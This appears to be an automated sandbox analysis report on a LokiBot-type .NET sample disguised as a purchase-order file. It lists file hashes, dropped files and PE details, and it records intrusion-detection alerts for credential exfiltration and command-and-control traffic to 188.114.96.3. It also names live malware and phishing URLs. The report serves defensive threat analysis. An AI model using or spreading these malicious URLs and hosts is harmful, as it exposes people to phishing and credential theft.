	w49A5FG3yg.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	733812cm.n9shteam.in/DefaultWordpress.php
	9XHFe6y4Dj.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	733812cm.n9shteam.in/DefaultWordpress.php
	SecuriteInfo.com.Win32.MalwareX-gen.14607.6011.exe	Get hash	malicious	Unknown	Browse	servicetelemetryserver.shop/api/index.php
	t1zTzS9a3r.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	abdulbek.top/externalvideoprotectdefaultsqlWindowsdlePrivate.php
	aQdB62N7SB.elf	Get hash	malicious	Shikitega, Xmrig	Browse	main.dsn.ovh/dns/lovely
	QUOTATION_OCTQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/DyuQ5y15/download

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
dddotx.shop	1e#U0414.exe	Get hash	malicious	Lokibot	Browse	188.114.96.3
dddotx.shop	(PO403810)_VOLEX_doc.exe	Get hash	malicious	Lokibot	Browse	188.114.97.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	http://url960.aceeduconsult.com/ls/click?upn=u001.LUpianUM71xe7PV7wDA6i1kcuy38W249FfPzE-2Fn4iGArrL0MQBCUZHFEzmfBrwW7hf5h8aNQUml0OSIHqpXf0LMpnaTL-2BzYU1WV-2BSTu4-2FYE-3DnWBx_C2kZwAnfGwUSqF5D87NbxLVpuF-2FUu77KiRgkAhE5NE4LxNdD8Vk-2BBXjUuKxXLIa0fIDZmJqQTdTMUWaKg74qY7H1042trEdUOL1Ty-2B4ikz6aamPgX0YPKifSgbmdnoJ9QNdI7-2Fj5HU9YtlUVfM2hhaIRlcN5LDyRrfABDYCmE6HCezIFJke-2Bw8MgqKR8oZe3x0bNQ5ip4gqKVt9OZvtTXtI2W19VoVZDzbdeDK4WD-2F3HaEv25gNxrltbLRhf8V-2BO7eWR3mjaJT30K-2BcVCwIlJZO7lziFom1TeAFneOePh2rvH67eyoHyRuDs7uhJ58UvSbL-2F5WGOZFqHf1Uoqm5u1BuusL-2F4yIoUS3Zge-2Bhwb2SPTTZrQp-2B3YQW62QJEBscu8XAGBtmCTNO-2FGrj9S-2BwtsmLluvkoUx0cXtIZxgyjwWcDifMxEpsoupBhIu0vHgSwbA5Jlj-2FdPy-2B0yhvKMBxhOgsBuXNzAVSfF8HuZvD5iWXinRKWqhNg1QpvfMK5Why8PnI5FwIsgrY7RxMkEbcDdf0VL1a7dM3RDh9LkpekDjtHu-2F4c-2FsI73UIfVUG4-2BbcH5VEOHzkCenTbIl-2BeYnL2jw9k-2Bt-2BAEZMQZavCq5q7Io2kchrzK3tu9Vj43TTv0K790k8tA4okR0vSuH0WvhSIZBs2e3uKgx9FK2SAr5JJzheB6cW2OXdbGgfDGPwGYkvJqNCBixLi9dWacb8fBed5RjA3p1JUsS79RbxF-2FaSjDqEr3OTeFx3WgBthSzcSYPpiE9ha00gB-2FAVdpFU8eOGGhrdGc6OgU4OZhDsRkN5FNMpRj3pgHOHQ6dkJW4RJx1-2B1Om8bljV3ruWQytV5mwg68-2FvnkkpkZM63omm27kalKxw-3D	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://egift.activationshub.com/gift-card/view/8lPFUrjq1LGzg7JHwS8hJJRdL/	Get hash	malicious	HTMLPhisher	Browse	104.26.0.222
	https://lnk.ie/73BGS/e=?utm_campaign=&utm_medium=email&utm_source=eloqua&utm_content=EMS&elqTrackId=b3e6296b7e034428ab6cf8165586e5f3&elq=f15d0983a3e2469a9348a180a5d34fca&elqaid=2922&elqat=1&elqCampaignId=1792&elqak=8AF50EC23DDB3CA8DB8B1F52080496E6D8BDFEE307A00555CA936F9692C081A369A3	Get hash	malicious	Unknown	Browse	104.18.95.41
	Payment for outstanding statements.pdf	Get hash	malicious	HTMLPhisher	Browse	172.64.151.101
	https://t.ly/8Lgfk	Get hash	malicious	Unknown	Browse	104.17.25.14
	z14Employee_Contract_pdf.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	Due Payment Invoice PISS2024993.exe	Get hash	malicious	FormBook	Browse	172.67.177.220
	ATT25322.html	Get hash	malicious	Unknown	Browse	162.247.243.29
	https://egift.activationshub.com/gift-card/view/8lPFUrjq1LGzg7JHwS8hJJRdL/	Get hash	malicious	Unknown	Browse	172.67.68.47
	EKSTRE_1022.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3

Process:	C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.360398796477698
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
MD5:	3A8957C6382192B71471BD14359D0B12
SHA1:	71B96C965B65A051E7E7D10F61BEBD8CCBB88587
SHA-256:	282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
SHA-512:	76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

C:\Users\user\AppData\Roaming\188E93\31437F.lck

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\89dad5d484a9f889a3a8dfca823edc3e_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	data
Category:	dropped
Size (bytes):	47
Entropy (8bit):	1.168829563685559
Encrypted:	false
SSDEEP:	3:/lSll2DQi:AoMi
MD5:	DAB633BEBCCE13575989DCFA4E2203D6
SHA1:	33186D50F04C5B5196C1FCC1FAD17894B35AC6C7
SHA-256:	1C00FBA1B82CD386E866547F33E1526B03F59E577449792D99C882DEF05A1D17
SHA-512:	EDDBB22D9FC6065B8F5376EC95E316E7569530EFAA9EA9BC641881D763B91084DCCC05BC793E8E29131D20946392A31BD943E8FC632D91EE13ABA7B0CD1C626F
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	........................................user.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.803665996976218
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	rPedidodecompra__PO20441__ARIMComponentes.exe
File size:	474'112 bytes
MD5:	13a22d03a02d5ba40e7865b1595db7a2
SHA1:	93fabdf07e6ed1c0316ebb5db63b28e041586e46
SHA256:	088bb7500d35c7ab73827301e505660559437479ef46312c3ee08b6253f35953
SHA512:	3b7c6f7d38eab796f043c8545ff1bf870e24d7f145df5593ab572bde1f423a242165314e4ec93ca69c13b41ffe86d2d6ee76d633ef9fc98f21f16eb868368d1d
SSDEEP:	6144:G9BrS6At7sb8op6Jncp3PIRQBVgbFgLIklqKgZ3zWOlCV3LG50vVzVpTT:kM4QoRpB+bGfjclCV3Li09zDT
TLSH:	28A4AE5CF7428A70C428157198E6882003657F7694B3DB7E3D8C73FA1BB339B584AE5A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....$.g..............0......*......./... ...@....@.. ....................................`................................

File Icon


Icon Hash:	460626073cc14907

Static PE Info

General

Entrypoint:	0x442fce
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x671A24C4 [Thu Oct 24 10:43:16 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x42f80	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x44000	0x32650	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x78000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x42f34	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x40fd4	0x41000	0408dbb46af3ebda48ce01d6ba5a72b9	False	0.7687762920673077	data	7.375405459723751	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x44000	0x32650	0x32800	6fd4f1f034dab368dd7dc90fc12aeb8e	False	0.46935914294554454	data	5.71284829084004	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x78000	0xc	0x200	cdeaef632e7d8ad422207683f829951e	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x442b0	0xa5d2	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.994982332155477
RT_ICON	0x4e884	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	0.25560451910564297
RT_ICON	0x5f0ac	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	0.35642211477822155
RT_ICON	0x68554	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	0.4021256931608133
RT_ICON	0x6d9dc	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	0.37299244213509686
RT_ICON	0x71c04	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	0.4450207468879668
RT_ICON	0x741ac	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	0.5103189493433395
RT_ICON	0x75254	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	0.5778688524590164
RT_ICON	0x75bdc	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	0.6400709219858156
RT_GROUP_ICON	0x76044	0x84	data	0.7272727272727273
RT_VERSION	0x760c8	0x39c	data	0.42857142857142855
RT_MANIFEST	0x76464	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-24T17:01:59.827885+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	49845	TCP
2024-10-24T17:01:59.827885+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	49826	TCP
2024-10-24T17:02:06.733299+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49704	188.114.96.3	80	TCP
2024-10-24T17:02:06.733299+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49704	188.114.96.3	80	TCP
2024-10-24T17:02:06.733299+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49704	188.114.96.3	80	TCP
2024-10-24T17:02:07.687491+0200	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.5	49704	188.114.96.3	80	TCP
2024-10-24T17:02:07.830536+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49705	188.114.96.3	80	TCP
2024-10-24T17:02:07.830536+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49705	188.114.96.3	80	TCP
2024-10-24T17:02:07.830536+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49705	188.114.96.3	80	TCP
2024-10-24T17:02:08.867503+0200	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.5	49705	188.114.96.3	80	TCP
2024-10-24T17:02:08.934078+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49706	188.114.96.3	80	TCP
2024-10-24T17:02:08.934078+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49706	188.114.96.3	80	TCP
2024-10-24T17:02:08.934078+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49706	188.114.96.3	80	TCP
2024-10-24T17:02:10.024741+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49706	188.114.96.3	80	TCP
2024-10-24T17:02:10.024741+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49706	188.114.96.3	80	TCP
2024-10-24T17:02:10.030314+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	49706	TCP
2024-10-24T17:02:10.185322+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49707	188.114.96.3	80	TCP
2024-10-24T17:02:10.185322+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49707	188.114.96.3	80	TCP
2024-10-24T17:02:10.185322+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49707	188.114.96.3	80	TCP
2024-10-24T17:02:11.080802+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49707	188.114.96.3	80	TCP
2024-10-24T17:02:11.080802+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49707	188.114.96.3	80	TCP
2024-10-24T17:02:11.088434+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	49707	TCP
2024-10-24T17:02:11.235526+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49708	188.114.96.3	80	TCP
2024-10-24T17:02:11.235526+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49708	188.114.96.3	80	TCP
2024-10-24T17:02:11.235526+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49708	188.114.96.3	80	TCP
2024-10-24T17:02:12.208821+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49708	188.114.96.3	80	TCP
2024-10-24T17:02:12.208821+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49708	188.114.96.3	80	TCP
2024-10-24T17:02:12.214201+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	49708	TCP
2024-10-24T17:02:12.361135+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49709	188.114.96.3	80	TCP
2024-10-24T17:02:12.361135+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49709	188.114.96.3	80	TCP
2024-10-24T17:02:12.361135+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49709	188.114.96.3	80	TCP
2024-10-24T17:02:13.387417+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49709	188.114.96.3	80	TCP
2024-10-24T17:02:13.387417+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49709	188.114.96.3	80	TCP
2024-10-24T17:02:13.394166+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	49709	TCP
2024-10-24T17:02:13.549321+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49710	188.114.96.3	80	TCP
2024-10-24T17:02:13.549321+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49710	188.114.96.3	80	TCP
2024-10-24T17:02:13.549321+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49710	188.114.96.3	80	TCP
2024-10-24T17:02:16.923354+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49710	188.114.96.3	80	TCP
2024-10-24T17:02:16.923354+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49710	188.114.96.3	80	TCP
2024-10-24T17:02:16.928848+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	49710	TCP
2024-10-24T17:02:17.079419+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49717	188.114.96.3	80	TCP
2024-10-24T17:02:17.079419+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49717	188.114.96.3	80	TCP
2024-10-24T17:02:17.079419+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49717	188.114.96.3	80	TCP
2024-10-24T17:02:20.447398+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49717	188.114.96.3	80	TCP
2024-10-24T17:02:20.447398+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49717	188.114.96.3	80	TCP
2024-10-24T17:02:20.453090+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	49717	TCP
2024-10-24T17:02:20.619456+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49735	188.114.96.3	80	TCP
2024-10-24T17:02:20.619456+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49735	188.114.96.3	80	TCP
2024-10-24T17:02:20.619456+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49735	188.114.96.3	80	TCP
2024-10-24T17:02:21.532098+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49735	188.114.96.3	80	TCP
2024-10-24T17:02:21.532098+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49735	188.114.96.3	80	TCP
2024-10-24T17:02:21.539727+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	49735	TCP
2024-10-24T17:02:21.691587+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49745	188.114.96.3	80	TCP
2024-10-24T17:02:21.691587+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49745	188.114.96.3	80	TCP
2024-10-24T17:02:21.691587+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49745	188.114.96.3	80	TCP
2024-10-24T17:02:22.993659+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49745	188.114.96.3	80	TCP
2024-10-24T17:02:22.993659+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49745	188.114.96.3	80	TCP
2024-10-24T17:02:22.999018+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	49745	TCP
2024-10-24T17:02:23.211146+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49757	188.114.96.3	80	TCP
2024-10-24T17:02:23.211146+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49757	188.114.96.3	80	TCP
2024-10-24T17:02:23.211146+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49757	188.114.96.3	80	TCP
2024-10-24T17:02:24.412934+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49757	188.114.96.3	80	TCP
2024-10-24T17:02:24.412934+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49757	188.114.96.3	80	TCP
2024-10-24T17:02:24.418373+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	49757	TCP
2024-10-24T17:02:24.561675+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49763	188.114.96.3	80	TCP
2024-10-24T17:02:24.561675+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49763	188.114.96.3	80	TCP
2024-10-24T17:02:24.561675+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49763	188.114.96.3	80	TCP
2024-10-24T17:02:25.588806+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49763	188.114.96.3	80	TCP
2024-10-24T17:02:25.588806+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49763	188.114.96.3	80	TCP
2024-10-24T17:02:25.594776+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	49763	TCP
2024-10-24T17:02:25.747925+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49774	188.114.96.3	80	TCP
2024-10-24T17:02:25.747925+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49774	188.114.96.3	80	TCP
2024-10-24T17:02:25.747925+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49774	188.114.96.3	80	TCP
2024-10-24T17:02:26.637709+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49774	188.114.96.3	80	TCP
2024-10-24T17:02:26.637709+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49774	188.114.96.3	80	TCP
2024-10-24T17:02:26.643572+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	49774	TCP
2024-10-24T17:02:26.794870+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49780	188.114.96.3	80	TCP
2024-10-24T17:02:26.794870+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49780	188.114.96.3	80	TCP
2024-10-24T17:02:26.794870+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49780	188.114.96.3	80	TCP
2024-10-24T17:02:27.669186+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49780	188.114.96.3	80	TCP
2024-10-24T17:02:27.669186+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49780	188.114.96.3	80	TCP
2024-10-24T17:02:27.675985+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	49780	TCP
2024-10-24T17:02:27.825461+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49786	188.114.96.3	80	TCP
2024-10-24T17:02:27.825461+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49786	188.114.96.3	80	TCP
2024-10-24T17:02:27.825461+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49786	188.114.96.3	80	TCP
2024-10-24T17:02:28.718139+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49786	188.114.96.3	80	TCP
2024-10-24T17:02:28.718139+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49786	188.114.96.3	80	TCP
2024-10-24T17:02:28.723928+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	49786	TCP
2024-10-24T17:02:28.879212+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49792	188.114.96.3	80	TCP
2024-10-24T17:02:28.879212+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49792	188.114.96.3	80	TCP
2024-10-24T17:02:28.879212+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49792	188.114.96.3	80	TCP
2024-10-24T17:02:29.781591+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49792	188.114.96.3	80	TCP
2024-10-24T17:02:29.781591+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49792	188.114.96.3	80	TCP
2024-10-24T17:02:29.787110+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	49792	TCP
2024-10-24T17:02:29.936630+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49798	188.114.96.3	80	TCP
2024-10-24T17:02:29.936630+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49798	188.114.96.3	80	TCP
2024-10-24T17:02:29.936630+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49798	188.114.96.3	80	TCP
2024-10-24T17:02:30.857303+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49798	188.114.96.3	80	TCP
